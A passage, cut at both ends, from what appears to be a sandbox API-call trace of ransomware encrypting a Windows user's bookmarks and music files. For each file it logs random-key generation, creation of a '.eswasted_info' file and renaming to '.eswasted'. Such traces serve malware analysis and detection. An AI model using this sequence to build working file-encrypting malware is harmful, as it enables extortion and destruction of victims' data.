(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.739] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0077.740] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.740] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.741] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.741] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.741] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.741] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.750] SetEndOfFile (hFile=0x108) returned 1 [0077.752] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.752] CloseHandle (hObject=0x108) returned 1 [0077.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0077.754] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.754] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.754] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.754] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0077.754] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x71ec18 [0077.755] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.755] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.755] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.755] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.756] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.757] SetEndOfFile (hFile=0x108) returned 1 [0077.757] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.757] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted")) returned 1 [0077.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.803] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0077.804] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.804] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.804] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.804] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.805] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.805] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.813] SetEndOfFile (hFile=0x108) returned 1 [0077.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.815] CloseHandle (hObject=0x108) returned 1 [0077.844] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0077.845] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.845] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.845] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0077.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a4) returned 0x71ec18 [0077.846] lstrcpyW (in: lpString1=0x71ecb2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.846] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.846] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.846] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.848] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.849] SetEndOfFile (hFile=0x108) returned 1 [0077.849] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.849] lstrcpyW (in: lpString1=0x71ecb2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted")) returned 1 [0078.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.127] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.128] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.129] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.129] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.129] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.130] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.130] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.299] SetEndOfFile (hFile=0x108) returned 1 [0078.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.301] CloseHandle (hObject=0x108) returned 1 [0078.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.303] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.304] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.304] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0078.304] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f6880 [0078.304] lstrcpyW (in: lpString1=0x6f6922, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.304] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x7208b8 [0078.304] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.305] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x7208b8 | out: pbBuffer=0x7208b8) returned 1 [0078.305] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.305] WriteFile (in: hFile=0x108, lpBuffer=0x7208b8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x7208b8*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.306] SetEndOfFile (hFile=0x108) returned 1 [0078.306] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.307] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.307] lstrcpyW (in: lpString1=0x6f6922, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted")) returned 1 [0078.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.348] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.348] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.349] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0078.349] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.349] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.349] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.350] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.358] SetEndOfFile (hFile=0x108) returned 1 [0078.360] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.360] CloseHandle (hObject=0x108) returned 1 [0078.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0078.362] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.362] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.400] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\05Kavo0Bhz0.mp3") returned 55 [0078.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x71ec18 [0078.400] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x7208b8 [0078.400] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.401] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x7208b8 | out: pbBuffer=0x7208b8) returned 1 [0078.401] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\05Kavo0Bhz0.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\05kavo0bhz0.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.464] WriteFile (in: hFile=0x124, lpBuffer=0x7208b8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x7208b8*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.465] SetEndOfFile (hFile=0x124) returned 1 [0078.465] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.465] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.465] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\05Kavo0Bhz0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\05kavo0bhz0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\05Kavo0Bhz0.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\05kavo0bhz0.mp3.eswasted")) returned 1 [0078.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\05Kavo0Bhz0.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\05kavo0bhz0.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.466] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0078.469] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.470] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.470] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.470] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.470] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.470] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.479] SetEndOfFile (hFile=0x124) returned 1 [0078.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.481] CloseHandle (hObject=0x124) returned 1 [0078.483] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.483] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.484] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.484] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6Sg551IYy27dhE H.mp3") returned 60 [0078.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71ec18 [0078.484] lstrcpyW (in: lpString1=0x71ec90, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x7208b8 [0078.484] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.484] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x7208b8 | out: pbBuffer=0x7208b8) returned 1 [0078.485] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6Sg551IYy27dhE H.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sg551iyy27dhe h.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.485] WriteFile (in: hFile=0x124, lpBuffer=0x7208b8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x7208b8*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.486] SetEndOfFile (hFile=0x124) returned 1 [0078.486] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.486] lstrcpyW (in: lpString1=0x71ec90, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6Sg551IYy27dhE H.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sg551iyy27dhe h.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6Sg551IYy27dhE H.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sg551iyy27dhe h.mp3.eswasted")) returned 1 [0078.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6Sg551IYy27dhE H.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sg551iyy27dhe h.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.487] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.489] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.490] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.490] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.490] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.490] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.490] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.499] SetEndOfFile (hFile=0x124) returned 1 [0078.501] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7208b8 | out: hHeap=0x6d0000) returned 1 [0078.501] CloseHandle (hObject=0x124) returned 1 [0078.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.503] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.573] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.573] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.573] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8TaZOoYez86tt7.wav") returned 58 [0078.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x71ec18 [0078.573] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.573] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.574] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.574] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8TaZOoYez86tt7.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8tazooyez86tt7.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.575] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.576] SetEndOfFile (hFile=0x108) returned 1 [0078.576] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.576] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8TaZOoYez86tt7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8tazooyez86tt7.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8TaZOoYez86tt7.wav.eswasted" (normalized: 